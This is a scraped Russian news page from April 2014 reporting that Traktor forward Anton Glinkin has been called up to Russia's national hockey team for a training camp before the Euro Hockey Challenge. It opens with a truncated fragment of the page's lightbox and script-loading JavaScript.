, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Форвард «Трактора» Антон Глинкин вызван в сборную России

Тренерский штаб сборной России по хоккею, который с недавнего времени возглавляет уроженец Южного Урала Олег Знарок, вызвал для участия в учебно-тренировочном сборе национальной команды нападающего «Трактора» Антона Глинкина.

Несмотря на неудачный для челябинского клуба сезон, к Глинкину у болельщиков и специалистов нет претензий. Наоборот, Антон был одним из лучших в составе черно-белых. Это заметили и тренеры сборной, вызвав талантливого форварда на сбор перед турниром «Кубок европейского хоккейного вызова».

Этот новый турнир пройдет поочередно в трех странах: в Словакии, Латвии и Германии с 10 по 26 апреля Антон Глинкин, недавно подписавший новый контракт с «Трактором» прибудет в расположение сборной 6 апреля.

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
9:29 - 01 апреля 2014
|
автор: U-RSS
|
(1 583)
|
(0)

Комментарии (0)

Я человек
Я бот